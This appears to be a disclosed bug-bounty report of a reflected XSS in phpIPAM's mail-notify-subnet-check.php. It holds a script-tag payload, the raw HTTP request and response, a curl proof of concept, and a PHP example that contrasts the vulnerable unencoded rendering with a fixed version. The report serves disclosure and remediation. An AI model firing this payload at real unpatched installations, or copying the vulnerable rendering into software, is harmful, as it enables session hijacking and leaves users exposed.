Cross Site Scripting (XSS) Reflected in phpipam/phpipam

Valid

Reported on

Dec 8th 2022


Description

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Proof of Concept

https://github.com/phpipam/phpipam/blob/master/app/subnets/mail-notify-subnet.php

Look at lines 94-95, where the "recipients" parameter is taken from the form without validation. I exploited the XSS with the payload <script>alert(1)</script>: the value is submitted to mail-notify-subnet-check.php, which echoes it back unencoded inside the "Invalid email address" error message, as the request and response below show.

91 <tr>
92      <th><?php print _('Recipients'); ?></th>
93      <td>
94          <input type="text" class='form-control input-sm pull-left' name="recipients" style="width:400px;margin-right:5px;">
95          <i class="fa fa-info input-append" rel="tooltip" data-placement="bottom" title="<?php print _('Separate multiple recepients with ,'); ?>"></i>
96      </td>
97  </tr>

//request

POST /phpipam/app/subnets/mail-notify-subnet-check.php HTTP/1.1
Host: 192.168.1.15
Content-Length: 233
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.15
Referer: http://192.168.1.15/phpipam/index.php?page=subnets&section=1&subnetId=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,id;q=0.8
Cookie: search_parameters=%7B%22addresses%22%3A%22off%22%2C%22subnets%22%3A%22off%22%2C%22vlans%22%3A%22off%22%2C%22vrf%22%3A%22off%22%2C%22pstn%22%3A%22off%22%2C%22circuits%22%3A%22off%22%2C%22customers%22%3A%22off%22%7D; table-page-size=50; phpipam=nud7ajr1q60hh5vldp4n619m50
Connection: close

recipients=%3Cscript%3Ealert(1)%3C%2Fscript%3E&subject=Subnet+details+%3A%3A+10.10.1.0%2F24&content=%E2%80%A2+Subnet%3A+%09%09+10.10.1.0%2F24%0D%0A%E2%80%A2+Description%3A%09%09+Customer+1&csrf_cookie=JgdkDHJcdNgm9oIwbzai9zXWvMahk4vZ

//response

HTTP/1.1 200 OK
Date: Thu, 08 Dec 2022 03:42:38 GMT
Server: Apache/2.4.52 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: phpipam=nud7ajr1q60hh5vldp4n619m50; expires=Fri, 09 Dec 2022 03:42:38 +0000; Max-Age=86400; path=/; SameSite=Lax; HttpOnly;
Vary: Accept-Encoding
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8

<div class='alert alert-danger'>Invalid email address - <script>alert(1)</script></div>

//POC in CURL

curl -i -s -k -X $'POST' \
    -H $'Host: 192.168.1.15' -H $'Content-Length: 233' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=subnets&section=1&subnetId=3' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
    -b $'search_parameters=%7B%22addresses%22%3A%22off%22%2C%22subnets%22%3A%22off%22%2C%22vlans%22%3A%22off%22%2C%22vrf%22%3A%22off%22%2C%22pstn%22%3A%22off%22%2C%22circuits%22%3A%22off%22%2C%22customers%22%3A%22off%22%7D; table-page-size=50; phpipam=nud7ajr1q60hh5vldp4n619m50' \
    --data-binary $'recipients=%3Cscript%3Ealert(1)%3C%2Fscript%3E&subject=Subnet+details+%3A%3A+10.10.1.0%2F24&content=%E2%80%A2+Subnet%3A+%09%09+10.10.1.0%2F24%0D%0A%E2%80%A2+Description%3A%09%09+Customer+1&csrf_cookie=JgdkDHJcdNgm9oIwbzai9zXWvMahk4vZ' \
    $'http://192.168.1.15/phpipam/app/subnets/mail-notify-subnet-check.php'
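
The following is an added example and not phpIPAM's own code: a stand-alone PHP script that reproduces the error path observed in the response above (the rejected "recipients" value concatenated straight into the alert div) next to a hardened version that validates each comma-separated recipient with filter_var() and HTML-encodes whatever is reflected back. The function names, the _() shim and the success message are assumptions made so the script runs on its own with the PHP CLI.

```php
<?php
// Added example, not phpIPAM's code. The vulnerable renderer is reconstructed
// from the response shown in the report; the hardened one applies the two
// controls a maintainer would add: validate input, and encode output.

if (!function_exists('_')) {
    // Stand-in for gettext's _() so the script runs without the extension (assumption).
    function _(string $s): string { return $s; }
}

// Reproduces the observed behaviour: user input lands in the HTML untouched.
function render_vulnerable(string $recipients): string
{
    return "<div class='alert alert-danger'>" . _('Invalid email address')
        . " - " . $recipients . "</div>";
}

// The tooltip in the form says recipients are comma-separated; split, trim, drop empties.
function split_recipients(string $recipients): array
{
    $parts = array_map('trim', explode(',', $recipients));
    return array_values(array_filter($parts, 'strlen'));
}

// Returns the entries that are not syntactically valid email addresses.
// FILTER_VALIDATE_EMAIL rejects anything containing '<', '>', quotes or whitespace,
// so a tag such as <script>alert(1)</script> never passes.
function invalid_recipients(string $recipients): array
{
    return array_values(array_filter(
        split_recipients($recipients),
        fn (string $r): bool => filter_var($r, FILTER_VALIDATE_EMAIL) === false
    ));
}

// Hardened renderer: validation decides the outcome, and the rejected value is
// still HTML-encoded because it is reflected into the response regardless.
// ENT_QUOTES also encodes ' and " so the value cannot break out of a quoted
// attribute if the same string is ever reused inside one.
function render_fixed(string $recipients): string
{
    $bad = invalid_recipients($recipients);
    if ($bad === []) {
        return "<div class='alert alert-success'>" . _('Notification sent') . "</div>";
    }
    $safe = htmlspecialchars(implode(', ', $bad), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<div class='alert alert-danger'>" . _('Invalid email address')
        . " - " . $safe . "</div>";
}

// Constructed inputs: the report's payload and a legitimate recipient list.
$payload = '<script>alert(1)</script>';
$legit   = 'admin@example.com, ops@example.com';

echo "vulnerable: ", render_vulnerable($payload), PHP_EOL;
echo "fixed:      ", render_fixed($payload), PHP_EOL;
echo "fixed:      ", render_fixed($legit), PHP_EOL;

// Self-check: the hardened output never contains a raw tag from user input.
$out = render_fixed($payload);
if (strpos($out, '<script') !== false || strpos($out, '&lt;script&gt;') === false) {
    throw new RuntimeException('output encoding failed');
}
if (invalid_recipients($legit) !== []) {
    throw new RuntimeException('valid addresses were rejected');
}
echo "self-check passed", PHP_EOL;
```

Run it with `php example.php`. The first line printed is exactly the reflected markup from the response above; the second shows the same payload rendered as inert text (`&lt;script&gt;alert(1)&lt;/script&gt;`). Encoding at the output point is what actually closes the XSS; the filter_var() check is defence in depth, since a future refactor could reflect a value that validation no longer covers.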

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

- Perform any action within the application that the user can perform.
- View any information that the user is able to view.
- Modify any information that the user is able to modify.
- Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

We are processing your report and will contact the phpipam team within 24 hours. (4 months ago)
ZenalArifin modified the report (4 months ago)
We have contacted a member of the phpipam team and are waiting to hear back. (4 months ago)

ZenalArifin (Researcher), 3 months ago:

Hello, any update?

garyallan validated this vulnerability 2 months ago
ZenalArifin has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
garyallan marked this as fixed in v1.5.1 with commit 8fbf87 2 months ago
garyallan has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Feb 5th 2023
garyallan published this vulnerability 2 months ago